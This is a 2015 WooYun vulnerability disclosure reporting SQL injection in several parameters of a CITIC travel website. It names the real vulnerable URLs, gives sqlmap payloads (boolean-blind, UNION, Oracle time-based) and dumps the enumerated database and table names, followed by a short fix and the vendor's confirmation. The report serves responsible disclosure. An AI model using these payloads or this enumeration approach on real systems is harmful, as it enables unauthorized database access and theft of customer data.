中信集团某业务多处DBA权限SQL注入漏洞（支持UNION）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100755

漏洞标题：中信集团某业务多处DBA权限SQL注入漏洞（支持UNION）

漏洞作者：路人甲

提交时间：2015-03-12 14:41

修复时间：2015-04-26 14:42

公开时间：2015-04-26 14:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-12：细节已通知厂商并且等待厂商处理中
2015-03-17：厂商已经确认，细节仅向厂商公开
2015-03-27：细节向核心白帽子及相关领域专家公开
2015-04-06：细节向普通白帽子公开
2015-04-16：细节向实习白帽子公开
2015-04-26：细节向公众公开

简要描述：

支持UNION

详细说明：

看了下中信旅游，挖了下存在不少问题：
看到中心忽略了，还是提交到国家应急响应中心吧
五处DBA权限SQL注入漏洞
1.http://www.travel.citic.com/shipList.jsp?shipid=1620 支持UNION
2.http://www.travel.citic.com/route_detail.jsp?routeid=201411240952
3.http://www.travel.citic.com/orderSuccess.jsp?routeid=201411240952
4.http://www.travel.citic.com/company.jsp?docid=001
这个是忽略的
5.http://www.travel.citic.com/enterprise_news_details.jsp?docid=6048

漏洞证明：

DBA权限：

数据库：

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: shipid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: shipid=1620 AND 9498=9498
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: shipid=-4760 UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(101)||CHR(85)||CHR(72)||CHR(67)||CHR(69)||CHR(68)||CHR(84)||CHR(112)||CHR(86)||CHR(111)||CHR(113)||CHR(107)||CHR(113)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- 
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: shipid=1620 AND 3836=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(102)||CHR(115)||CHR(99),5)
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SUBCITIC
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRAVELADMIN
[*] TSMSYS
[*] WMSYS
[*] XDB

505个表

back-end DBMS: Oracle
Database: TRAVELADMIN
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| TH_ACTIONLOG                 | 33381   |
| TH_QUOTATION                 | 22267   |
| TH_GROUPDAY                  | 13227   |
| TH_MEALSTANDARD              | 10428   |
| TH_AIRPORT                   | 7272    |
| TH_ZWDM                      | 6764    |
| TH_ZWDM090728                | 6407    |
| TH_GROUPMEALSTANDARD         | 5178    |
| TH_BUDGETFEE                 | 4972    |
| TH_ROUTEITEMPOS              | 4551    |
| TH_GROUPHOTELSTANDARD        | 3569    |
| TH_ITINERARYCITY             | 3014    |
| TH_USER_ATTR_DATA_DICT       | 2992    |
| TH_QPREPORT                  | 2978    |
| TH_HOTELSTANDARDCONSULT      | 2898    |
| TH_GROUPCOUNTRY              | 2523    |
| TH_MSGUSER                   | 2148    |
| TH_GUEST                     | 2093    |
| TH_GROUPDAY_OPE              | 1769    |
| TH_GUEST_VISA_MATERIAL       | 1710    |
| TH_OPHOTEL                   | 1665    |
| TH_PRV_HOTEL_1               | 1662    |
| TH_VISA_MATERIAL_CLASSIFY    | 1524    |
| TH_ITINERARYTRAFFIC          | 1515    |
| TH_VISA_FIELD                | 1418    |
| TH_GROUPTOURGUIDE            | 1188    |
| TH_GROUPPT                   | 1112    |
| TH_GROUPCHARGESIGHT          | 1095    |
| TH_GROUPHOTELSTANDARD_OPE    | 1026    |
| TH_WEB_TAG_ACT               | 987     |
| TH_SYS_PERMMISION_PART       | 972     |
| TH_SYS_PART_UIFUNROLE_ZYG    | 960     |
| TH_GUEST_EXTEND              | 959     |
| TH_SYS_PART_UIFUNROLE        | 935     |
| TH_CITY                      | 767     |
| TH_UIFUNROLE                 | 661     |
| TH_WEB_CITY                  | 654     |
| TH_SYS_PERMMISION            | 598     |
| TH_OPASSIGN                  | 589     |
| TH_MENU                      | 578     |
| TH_PROVIDERCICERONE_20100601 | 578     |
| TH_PROVIDERCICERONE_ZYG      | 577     |
| TH_PROVIDERCICERONE_ZYG_BAK  | 577     |
| TH_PROVIDERCICERONE          | 576     |
| TH_CITYDISTANCE              | 539     |
| TH_WEB_TAG_MAIN              | 514     |
| TH_GROUPCOST_DAY             | 503     |
| TH_VISA_GUEST_PDF_ATTR       | 499     |
| TH_USER_KIND_ATTRIBUTE       | 484     |
| TH_WEB_LOGS                  | 468     |
| TH_ITINERARY_ITEM            | 459     |
| TH_PDDETAIL                  | 456     |
| TH_WEB_OUTCUSTOM             | 443     |
| TH_GROUPCHARGEPROGRAM        | 398     |
| TH_OPHOTEL_MEMO              | 386     |
| TH_CNCITY                    | 380     |
| TH_GUEST_EXTEND_SPECIAL      | 377     |
| TH_ROOMGUEST_DETAIL          | 353     |
| TH_OPORDER                   | 351     |
| TH_WEB_GROUPINFO             | 350     |
| TH_GROUPOPETOURGUIDE         | 349     |
| TH_GROUPFEE                  | 347     |
| TH_TDZJ_XSZJ                 | 337     |
| TH_PROVIDERSITE              | 331     |
| TH_GROUPOTHERPRICE           | 316     |
| TH_FAX_RECEIVE               | 311     |
| TH_FAX_DOC                   | 295     |
| TH_GROUP_VISA                | 295     |
| TH_WORDDICT                  | 293     |
| TH_FAX_TASK                  | 289     |
| TH_MSGUSER_HIS               | 283     |
| TH_PROVIDERMEAL              | 276     |
| TH_USER_ATTRIBUTE_DICT       | 264     |
| TH_PROVIDERSITE_OUTBOUND     | 259     |
| TH_SYS_EMP_PART              | 259     |
| TH_TAKEFEEPLAN               | 254     |
| TH_VISA_DATA_DICT            | 242     |
| TH_WEB_ROOM                  | 240     |
| TH_GROUPPLANEOPERESULT       | 232     |
| TH_COSTCAR_NEW               | 226     |
| TH_GROUPBASECOST             | 218     |
| TH_ITINERARYDAYSCHEDULE      | 215     |
| TH_GROUPINFO                 | 212     |
| TH_MSG                       | 199     |
| TH_BIZORDER                  | 195     |
| TH_VISASUBTYPE               | 191     |
| TH_COUNTRY                   | 187     |
| TH_GROUP_CITYSHOP            | 184     |
| TH_GROUP_GUIDEFEE            | 177     |
| TH_ACCOUNT_DETAIL            | 160     |
| TH_APPFLDLISTSET             | 157     |
| TH_OPHOTEL_NEW               | 152     |
| TH_AUDITBUSINESS             | 150     |
| FAXSTAT                      | 149     |
| TH_PROVIDERTRAFIC            | 149     |
| TH_TDZJ_CZZLJK               | 149     |
| TH_MV_GROUPINFO_A            | 148     |
| TH_BUDGETCHANGE              | 147     |
| TH_GROUPPROCESS_MEMO         | 144     |
| TH_OPCARORDER                | 135     |
| TH_EMP_LINKER                | 130     |
| TH_VISATYPE                  | 119     |
| TH_EMP_CLIENT                | 118     |
| TH_ROOMGUEST_GDAY            | 118     |
| TH_FEEORIGINALVOUCHERCONF    | 116     |
| TH_WEB_USER                  | 112     |
| TH_HOTEL_ORDER               | 111     |
| TH_DAYWORK_LOG               | 109     |
| TH_GROUPOFFICESCHEDULE       | 108     |
| TH_ONLINE_USER               | 105     |
| TH_GROUPPROCESS              | 104     |
| TH_OHOTEL_AUDITMEMO          | 103     |
| TH_VISATYPE_DATAFLOW         | 103     |

修复方案：

整型转换下参数shipid\routeid\docid

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-03-17 11:28

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT向中信通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100755

漏洞标题：中信集团某业务多处DBA权限SQL注入漏洞（支持UNION）

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-03-12 14:41

修复时间：2015-04-26 14:42

公开时间：2015-04-26 14:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100755

漏洞标题：中信集团某业务多处DBA权限SQL注入漏洞（支持UNION）

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-03-12 14:41

修复时间：2015-04-26 14:42

公开时间：2015-04-26 14:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0100755"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云